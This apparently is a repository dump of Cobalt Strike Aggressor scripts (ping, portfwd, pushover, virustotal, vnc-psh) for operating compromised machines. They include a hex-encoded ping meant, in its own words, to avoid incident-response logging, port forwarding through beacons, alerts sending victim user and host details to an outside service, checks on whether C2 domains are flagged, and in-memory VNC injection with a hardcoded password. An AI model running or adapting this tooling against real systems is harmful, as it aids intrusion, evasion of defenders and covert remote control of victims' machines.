1){ 31 | $p2hs = "0 $+ $p2hs"; 32 | } 33 | if (strlen($p3hs) == 1){ 34 | $p3hs = "0 $+ $p3hs"; 35 | } 36 | if (strlen($p4hs) == 1){ 37 | $p4hs = "0 $+ $p4hs"; 38 | } 39 | 40 | $final = "0x $+ $p1hs $+ $p2hs $+ $p3hs $+ $p4hs"; 41 | 42 | btask($1, "ping $ip $+ : $+ $final"); 43 | bshell($1, "ping $final"); 44 | } 45 | else{ 46 | berror($1, "Invalid IP address"); 47 | } 48 | } 49 | else{ 50 | berror($1, "You must specify an IP address"); 51 | } 52 | } 53 | 54 | beacon_command_register("ping", "Issues Ping on the target after converting it to hex format to avoid some IR.", 55 | "Syntax: ping [IP address]\n" . 56 | "Issues a ping on the IP address specified after converting it to hex format to avoid some IR logging."); 57 | 58 | -------------------------------------------------------------------------------- /portfwd.cna: -------------------------------------------------------------------------------- 1 | sub _portfwd { 2 | if ($2 eq "stop") { 3 | btask($1, "Tasked session to stop forward to $3"); 4 | call("beacons.pivot_stop_port", $null, $3); 5 | } 6 | else { 7 | btask($1, "Tasked session to forward $3 to $2 $+ : $+ $3"); 8 | call("beacons.portfwd", $null, $1, $2, int($3)); 9 | } 10 | } 11 | 12 | # beacons 13 | beacon_command_register("portfwd", "create a port forward", "Synopsis: portfwd [stop| ]\nCreate a port forward : -> current beacon -> :"); 14 | 15 | alias portfwd { 16 | _portfwd($1, $2, $3); 17 | } 18 | 19 | # ssh sessions 20 | ssh_command_register("portfwd", "create a port forward", "Synopsis: portfwd [stop| ]\nCreate a port forward : -> current beacon -> :"); 21 | 22 | ssh_alias portfwd { 23 | _portfwd($1, $2, $3); 24 | } -------------------------------------------------------------------------------- /pushover-ng.cna: -------------------------------------------------------------------------------- 1 | # This script adds basic pushover functionality to Cobalt Strike 2 | # Ensure that you configure the pushover users in pushover-cs, ensure it is executeable 3 | # @Und3rf10w 4 | # Modded by @vysecurity 5 | 6 | $location = "https://"; 7 | $uri = "/URI"; 8 | $token = ""; 9 | $user = ""; 10 | 11 | import java.net.URLEncoder; 12 | import java.io.BufferedReader; 13 | import java.io.DataOutputStream; 14 | import java.io.InputStreamReader; 15 | import java.net.HttpURLConnection; 16 | import java.net.URL; 17 | 18 | sub sendpost{ 19 | 20 | $url = $1; 21 | $body = $2 . "\r\n"; 22 | 23 | $USER_AGENT = "Mozilla/5.0"; 24 | 25 | 26 | $urlobj = [new URL: $url]; 27 | 28 | $con = [$urlobj openConnection]; 29 | 30 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 31 | 32 | [$con setRequestMethod: "POST"]; 33 | 34 | [$con setDoOutput: false]; 35 | 36 | [$con setRequestMethod: $method]; 37 | 38 | [$con setDoOutput: true]; 39 | 40 | [$con connect]; 41 | 42 | $wr = [new DataOutputStream: [$con getOutputStream]]; 43 | [$wr writeBytes: $body]; 44 | [$wr flush]; 45 | [$wr close]; 46 | 47 | $responseCode = [$con getResponseCode]; 48 | 49 | 50 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 51 | 52 | $inputLine = ""; 53 | 54 | $response = ""; 55 | 56 | $inputLine = [$in readLine]; 57 | $response = $response . $inputLine . "\r\n"; 58 | 59 | while ($inputLine ne ""){ 60 | $inputLine = [$in readLine]; 61 | $response = $response . $inputLine . "\r\n"; 62 | } 63 | 64 | [$in close]; 65 | 66 | #elog($method . ": " . $url . ": " . $responseCode); 67 | #elog($response); 68 | 69 | return $response; 70 | 71 | 72 | } 73 | 74 | sub sendget{ 75 | 76 | $url = $1; 77 | 78 | $USER_AGENT = "Mozilla/5.0"; 79 | 80 | 81 | $urlobj = [new URL: $url]; 82 | 83 | $con = [$urlobj openConnection]; 84 | 85 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 86 | 87 | [$con setRequestMethod: "GET"]; 88 | 89 | $responseCode = [$con getResponseCode]; 90 | 91 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 92 | 93 | $inputLine = ""; 94 | 95 | $response = ""; 96 | 97 | $inputLine = [$in readLine]; 98 | $response = $response . $inputLine . "\r\n"; 99 | 100 | while ($inputLine ne ""){ 101 | $inputLine = [$in readLine]; 102 | $response = $response . $inputLine . "\r\n"; 103 | } 104 | 105 | [$in close]; 106 | 107 | #elog($method . ": " . $url . ": " . $responseCode); 108 | #elog($response); 109 | 110 | return $response; 111 | 112 | 113 | } 114 | 115 | on ready { 116 | elog("Pushover notifications are now configured"); 117 | } 118 | 119 | #on event_notify { 120 | # $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 121 | # pushover("CS:System_Event","$time $+ : $1"); 122 | #} 123 | 124 | on event_join { 125 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 126 | pushover("CS:User_Joined","$time $+ : $1 has joined"); 127 | } 128 | 129 | on event_action { 130 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 131 | pushover("CS:Action_Performed","$time $+ : < $+ $3 $+ >: $1 "); 132 | } 133 | 134 | on event_public { 135 | $time = formatDate($3, "yyyy.MM.dd 'at' HH:mm:ss z"); 136 | pushover("CS:New_Message","$time $+ : < $+ $1 $+ >: $2 "); 137 | } 138 | 139 | on event_quit { 140 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 141 | pushover("CS:User_Left","$time $+ : $1 has quit"); 142 | } 143 | 144 | on ssh_initial { 145 | pushover("CS:New_SSH", "New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer")); 146 | } 147 | 148 | on profiler_hit { 149 | pushover("CS:Profiler_Hit","Profiler Hit Received - External: $1 | Internal: $2 | UA: $3 | Email: " . tokenToEmail($5)); 150 | } 151 | 152 | on web_hit { 153 | # elog($1); 154 | if ($1 == "POST" && $5 == "404 Not Found"){ 155 | $time = formatDate($9, "yyyy.MM.dd 'at' HH:mm:ss z"); 156 | $vuri = $2; 157 | $eval = strrep($vuri, $uri, ""); 158 | # eval contains final bid number to exit 159 | bexit($eval); 160 | 161 | } 162 | } 163 | 164 | on beacon_initial { 165 | 166 | 167 | $org = getorg(binfo($1, "external")); 168 | 169 | bnote($1, $org); 170 | 171 | if (-isadmin $1){ 172 | pushover2("CS:New_Beacon","New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ADMIN BEACON | ORG: " . $org . " | IP: " . binfo($1, "external"), $1); 173 | $elog = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ADMIN BEACON | ORG: " . $org . " IP: " . binfo($1, "external"); 174 | } 175 | else { 176 | pushover2("CS:New_Beacon","New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ORG: " . $org . " | IP: " . binfo($1, "external"), $1); 177 | $elog = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ORG: " . $org . " | IP: " . binfo($1, "external"); 178 | } 179 | 180 | elog("\x039".$elog); 181 | } 182 | 183 | sub pushover { 184 | $title = $1; 185 | $message = $2; 186 | 187 | $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message; 188 | # elog($body); 189 | 190 | sendpost("https://api.pushover.net/1/messages.json", $body); 191 | 192 | } 193 | 194 | sub pushover2 { 195 | $title = $1; 196 | $message = $2; 197 | $b = $3; 198 | 199 | $body = "callback=" . $location . $uri . $b . "&priority=2&retry=60&expire=10800&token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message; 200 | #elog($body); 201 | 202 | sendpost("https://api.pushover.net/1/messages.json", $body); 203 | 204 | } 205 | 206 | sub getorg{ 207 | $ip = $1; 208 | $url = "http://api.hackertarget.com/aslookup/?q=" . $ip; 209 | $res = sendget($url); 210 | #elog("RES: ". $res); 211 | ($ip, $asn, $range, $org) = split(',', $res); 212 | 213 | $ip = strrep($ip, "\"", ""); 214 | 215 | $asn = strrep($asn, "\"", ""); 216 | 217 | $range = strrep($range, "\"", ""); 218 | 219 | $org = strrep($org, "\"", ""); 220 | 221 | #elog("IP: " . $ip); 222 | #elog("ASN: " . $asn); 223 | #elog("RANGE: " . $range); 224 | #elog("ORG: " . $org); 225 | 226 | return $org; 227 | 228 | 229 | } -------------------------------------------------------------------------------- /pushover.cna: -------------------------------------------------------------------------------- 1 | # This script adds basic pushover functionality to Cobalt Strike 2 | # Ensure that you configure the pushover users in pushover-cs, ensure it is executeable 3 | # @Und3rf10w 4 | # Modded by @vysecurity 5 | 6 | $location = "https://"; 7 | $uri = "/URI"; 8 | $token = ""; 9 | $user = ""; 10 | 11 | import java.net.URLEncoder; 12 | import java.io.BufferedReader; 13 | import java.io.DataOutputStream; 14 | import java.io.InputStreamReader; 15 | import java.net.HttpURLConnection; 16 | import java.net.URL; 17 | 18 | sub sendpost{ 19 | 20 | $url = $2; 21 | $body = $3 . "\r\n"; 22 | 23 | $USER_AGENT = "Mozilla/5.0"; 24 | 25 | 26 | $urlobj = [new URL: $url]; 27 | 28 | $con = [$urlobj openConnection]; 29 | 30 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 31 | 32 | [$con setRequestMethod: "POST"]; 33 | 34 | [$con setDoOutput: false]; 35 | 36 | [$con setRequestMethod: $method]; 37 | 38 | [$con setDoOutput: true]; 39 | 40 | [$con connect]; 41 | 42 | $wr = [new DataOutputStream: [$con getOutputStream]]; 43 | [$wr writeBytes: $body]; 44 | [$wr flush]; 45 | [$wr close]; 46 | 47 | $responseCode = [$con getResponseCode]; 48 | 49 | 50 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 51 | 52 | $inputLine = ""; 53 | 54 | $response = ""; 55 | 56 | $inputLine = [$in readLine]; 57 | $response = $response . $inputLine . "\r\n"; 58 | 59 | while ($inputLine ne ""){ 60 | $inputLine = [$in readLine]; 61 | $response = $response . $inputLine . "\r\n"; 62 | } 63 | 64 | [$in close]; 65 | 66 | #elog($method . ": " . $url . ": " . $responseCode); 67 | #elog($response); 68 | 69 | return $response; 70 | 71 | 72 | } 73 | 74 | sub sendget{ 75 | 76 | $method = $1; 77 | 78 | $url = $2; 79 | 80 | $USER_AGENT = "Mozilla/5.0"; 81 | 82 | 83 | $urlobj = [new URL: $url]; 84 | 85 | $con = [$urlobj openConnection]; 86 | 87 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 88 | 89 | [$con setRequestMethod: "GET"]; 90 | 91 | $responseCode = [$con getResponseCode]; 92 | 93 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 94 | 95 | $inputLine = ""; 96 | 97 | $response = ""; 98 | 99 | $inputLine = [$in readLine]; 100 | $response = $response . $inputLine . "\r\n"; 101 | 102 | while ($inputLine ne ""){ 103 | $inputLine = [$in readLine]; 104 | $response = $response . $inputLine . "\r\n"; 105 | } 106 | 107 | [$in close]; 108 | 109 | #elog($method . ": " . $url . ": " . $responseCode); 110 | #elog($response); 111 | 112 | return $response; 113 | 114 | 115 | } 116 | 117 | on ready { 118 | elog("Pushover notifications are now configured"); 119 | } 120 | 121 | #on event_notify { 122 | # $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 123 | # pushover("CS:System_Event","$time $+ : $1"); 124 | #} 125 | 126 | on event_join { 127 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 128 | pushover("CS:User_Joined","$time $+ : $1 has joined"); 129 | } 130 | 131 | on event_action { 132 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 133 | pushover("CS:Action_Performed","$time $+ : < $+ $3 $+ >: $1 "); 134 | } 135 | 136 | on event_public { 137 | $time = formatDate($3, "yyyy.MM.dd 'at' HH:mm:ss z"); 138 | pushover("CS:New_Message","$time $+ : < $+ $1 $+ >: $2 "); 139 | } 140 | 141 | on event_quit { 142 | $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); 143 | pushover("CS:User_Left","$time $+ : $1 has quit"); 144 | } 145 | 146 | on ssh_initial { 147 | pushover("CS:New_SSH", "New SSH Session Received - ID: $1 | Hostname " . binfo($1, "computer")); 148 | } 149 | 150 | on profiler_hit { 151 | pushover("CS:Profiler_Hit","Profiler Hit Received - External: $1 | Internal: $2 | UA: $3 | Email: " . tokenToEmail($5)); 152 | } 153 | 154 | on web_hit { 155 | # elog($1); 156 | if ($1 == "POST" && $5 == "404 Not Found"){ 157 | $time = formatDate($9, "yyyy.MM.dd 'at' HH:mm:ss z"); 158 | $vuri = $2; 159 | $eval = strrep($vuri, $uri, ""); 160 | # eval contains final bid number to exit 161 | bexit($eval); 162 | 163 | } 164 | } 165 | 166 | on beacon_initial { 167 | if (-isadmin $1){ 168 | pushover2("CS:New_Beacon","New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ADMIN BEACON", $1); 169 | $elog = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host") . " | ADMIN BEACON"; 170 | } 171 | else { 172 | pushover2("CS:New_Beacon","New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host"), $1); 173 | $elog = "New Beacon Received - ID: $1 | User: " . binfo($1, "user") . " | Hostname: " . binfo($1, "computer") . " | PID: " . binfo($1,"pid") . " | HOST: " . binfo($1,"host"); 174 | } 175 | elog("\x039".$elog); 176 | 177 | $org = getorg(binfo($1, "external")); 178 | 179 | bnote($1, $org); 180 | } 181 | 182 | sub pushover { 183 | $title = $1; 184 | $message = $2; 185 | 186 | $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message; 187 | # elog($body); 188 | 189 | sendpost("https://api.pushover.net/1/messages.json", $body); 190 | 191 | } 192 | 193 | sub pushover2 { 194 | $title = $1; 195 | $message = $2; 196 | $b = $3; 197 | 198 | $body = "callback=" . $location . $uri . $b . "&priority=2&retry=10800&expire=10800&token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message; 199 | elog($body); 200 | 201 | sendpost("https://api.pushover.net/1/messages.json", $body); 202 | 203 | } 204 | 205 | 206 | sub getorg{ 207 | $ip = $1; 208 | $url = "http://api.hackertarget.com/aslookup/?q=" . $ip; 209 | $res = sendget("GET", $url); 210 | elog("RES: ". $res); 211 | ($ip, $asn, $range, $org) = split(',', $res); 212 | 213 | $ip = strrep($ip, "\"", ""); 214 | 215 | $asn = strrep($asn, "\"", ""); 216 | 217 | $range = strrep($range, "\"", ""); 218 | 219 | $org = strrep($org, "\"", ""); 220 | 221 | elog("IP: " . $ip); 222 | elog("ASN: " . $asn); 223 | elog("RANGE: " . $range); 224 | elog("ORG: " . $org); 225 | 226 | return $org; 227 | 228 | 229 | } -------------------------------------------------------------------------------- /test.cna: -------------------------------------------------------------------------------- 1 | sub callback { 2 | println("Dialog was actioned. Button: $2 Values: $3"); 3 | } 4 | 5 | alias host{ 6 | 7 | $dialog = dialog("Host File", %(uri => "/raw.sct", port => 80, mimetype => "text/scriptlet"), &callback); 8 | dialog_description($dialog, "Host a file through Cobalt Strike's web server"); 9 | 10 | drow_file($dialog, "file", "File:"); 11 | drow_text($dialog, "uri", "Local URI:"); 12 | drow_text($dialog, "host", "Local Host:", 20); 13 | drow_text($dialog, "port", "Local Port:"); 14 | drow_combobox($dialog, "mimetype", "Mime Type:", @("automatic", "application/octet-stream", "text/html", "text/plain")); 15 | 16 | dbutton_action($dialog, "Launch"); 17 | dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file"); 18 | 19 | dialog_show($dialog); 20 | 21 | } -------------------------------------------------------------------------------- /virustotal-ng.cna: -------------------------------------------------------------------------------- 1 | # VirusTotal Notifications 2 | # Checks VirusTotal for your IOC 3 | 4 | 5 | import java.net.URLEncoder; 6 | import java.io.BufferedReader; 7 | import java.io.DataOutputStream; 8 | import java.io.InputStreamReader; 9 | import java.net.HttpURLConnection; 10 | import java.net.URL; 11 | 12 | global('@global_maldomains'); 13 | @global_maldomains = @(); 14 | 15 | sub sendhttp{ 16 | 17 | $method = $1; 18 | $url = $2; 19 | $body = $3 . "\r\n"; 20 | 21 | $USER_AGENT = "Mozilla/5.0"; 22 | 23 | 24 | $urlobj = [new URL: $url]; 25 | 26 | $con = [$urlobj openConnection]; 27 | 28 | [$con setRequestMethod: $method]; 29 | 30 | [$con setRequestProperty: "User-Agent", $USER_AGENT]; 31 | 32 | [$con setDoOutput: true]; 33 | $wr = [new DataOutputStream: [$con getOutputStream]]; 34 | [$wr writeBytes: $body]; 35 | [$wr flush]; 36 | [$wr close]; 37 | 38 | $responseCode = [$con getResponseCode]; 39 | 40 | $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; 41 | 42 | $inputLine = ""; 43 | 44 | $response = ""; 45 | 46 | $inputLine = [$in readLine]; 47 | $response = $response . $inputLine . "\r\n"; 48 | 49 | while ($inputLine ne ""){ 50 | $inputLine = [$in readLine]; 51 | $response = $response . $inputLine . "\r\n"; 52 | } 53 | 54 | [$in close]; 55 | 56 | return $response; 57 | 58 | } 59 | 60 | sub pushover { 61 | $token = "TOKEN"; 62 | $user = "USER"; 63 | $title = $1; 64 | $message = $2; 65 | 66 | $body = "token=" . $token . "&user=" . $user . "&title=" . $title . "&message=" . $message; 67 | 68 | sendhttp("POST", "https://api.pushover.net/1/messages.json", $body); 69 | } 70 | 71 | sub vtdomain { 72 | $api = "VTAPIKEY"; 73 | 74 | $domain = $1; 75 | 76 | $params = "?apikey=" . $api . "&resource=" . $domain; 77 | 78 | $url = "https://www.virustotal.com/vtapi/v2/url/report" . $params; 79 | 80 | return sendhttp("GET", $url, ""); 81 | } 82 | 83 | sub domains{ 84 | 85 | @domains = @(); 86 | $a = listeners(); 87 | 88 | foreach $b ($a) { 89 | $c = listener_info($b); 90 | $host = $c["host"]; 91 | if ($host !isin @domains){ 92 | add(@domains, $host, -1); 93 | } 94 | $beacons = $c["beacons"]; 95 | @beacons_list = split(", ",$beacons); 96 | foreach $beacon (@beacons_list){ 97 | if ($beacon !isin @domains){ 98 | add(@domains, $beacon, -1); 99 | } 100 | } 101 | } 102 | 103 | @vtmaldomains = @(); 104 | 105 | foreach $domain (@domains){ 106 | $res = vtdomain($domain); 107 | if ("{\"scan_id\"" isin $res){ 108 | # Domain seen in VT 109 | if ("\"positives\": 0" isin $res){ 110 | # Undetected 111 | elog("\cD[VT] Clean: \c9" . $domain); 112 | } 113 | else{ 114 | add(@vtmaldomains, $domain, -1); 115 | } 116 | } 117 | else{ 118 | elog("\cD[VT] Not found: \c9" . $domain); 119 | } 120 | } 121 | 122 | return @vtmaldomains; 123 | } 124 | 125 | on heartbeat_10m { 126 | @maldom = domains(); 127 | 128 | foreach $domain (@maldom){ 129 | if ($domain !isin @global_maldomains){ 130 | add(@global_maldomains, $domain, -1); 131 | $time = formatDate(dstamp(ticks()), "yyyy.MM.dd 'at' HH:mm:ss z"); 132 | elog("\cD[VT] New malicious domain added: \c4" . $domain); 133 | pushover("[VT] " . $domain . " MALICIOUS", $domain . " is classed as malicious"); 134 | } 135 | } 136 | } 137 | 138 | 139 | 140 | on ready { 141 | elog("VirusTotal notifications are now configured"); 142 | } -------------------------------------------------------------------------------- /vnc-psh.cna: -------------------------------------------------------------------------------- 1 | # Provides GUI around Invoke-VNC by @artkond 2 | # https://github.com/artkond/Invoke-Vnc 3 | # 4 | # Author: @vysecurity 5 | 6 | $Port = '5900'; 7 | $Password = 'SuperMan123'; 8 | 9 | sub vnc-settings { 10 | $bid = $1; 11 | 12 | $dialog = dialog("Invoke-VNC Settings", %(sPort => $Port, sPassword => $Password), lambda({ 13 | # save config 14 | $Port = $3['sPort']; 15 | $Password = $3['sPassword']; 16 | if ($2 eq 'Run'){ 17 | btask($bid, "Injecting VNC into memory"); 18 | bpowershell_import($bid, script_resource("Invoke-Vnc.ps1")); 19 | $command = "Invoke-Vnc -ConType bind -Port $+ $3['sPort'] $+ -Password $+ $3['sPassword']"; 20 | bpowershell($bid,$command); 21 | blog($bid, "Connect to the machine on port $+ $3['sPort'] $+ using the password: $+ $3['sPassword']"); 22 | } 23 | })); 24 | 25 | dialog_description($dialog, "Specify Port and Password for VNC Bind. Make sure architecture of current PID matches OS."); 26 | drow_text($dialog, "sPort", "Bind Port:"); 27 | drow_text($dialog, "sPassword", "Password:"); 28 | 29 | dbutton_action($dialog, "Run"); 30 | dbutton_action($dialog, "Cancel"); 31 | dialog_show($dialog); 32 | } 33 | 34 | # Inject VNC into memory 35 | alias vnc-psh{ 36 | vnc-settings($1); 37 | } 38 | 39 | beacon_command_register("vnc-psh", "Starts a VNC listener on the machine", 40 | "Synopsis: vnc-psh [bind port] [password]\n\n" . 41 | "Starts a VNC listener on the machine. Default Bind Port is 5900. Default password is SuperMan123\r\n" . 42 | "Architecture of the current process must match the OS."); --------------------------------------------------------------------------------